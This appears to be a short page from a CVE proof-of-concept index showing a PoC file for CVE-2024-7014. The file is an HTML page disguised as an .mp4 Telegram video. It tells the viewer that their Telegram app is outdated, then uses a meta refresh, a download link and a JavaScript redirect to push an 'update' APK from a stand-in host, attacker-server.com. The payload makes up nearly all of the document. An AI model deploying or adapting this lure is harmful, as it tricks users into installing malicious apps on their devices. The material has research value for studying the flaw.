4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / Poc_CVE_2024_7014.txt TXT
<!-- Poc_CVE_2024_7014.mp4 -->
<html>
  <head>
    <title>Telegram Exclusive Video</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="refresh" content="0; url=http://attacker-server.com/download/telegram-update.apk">
    <style>
      body { font-family: Arial, sans-serif; text-align: center; margin-top: 50px; }
      .warning { color: red; font-weight: bold; }
    </style>
  </head>
  <body>
    <h2>Telegram Exclusive Video Player</h2>
    <p class="warning">Your Telegram app is outdated and cannot play this video.</p>
    <p>Please update to the latest version to watch:</p>
    <a href="http://attacker-server.com/download/telegram-update.apk" id="downloadLink">Download Update</a>
    <script>
      setTimeout(function() {
        window.location.href = "http://attacker-server.com/download/telegram-update.apk";
      }, 2000);
    </script>
  </body>
</html>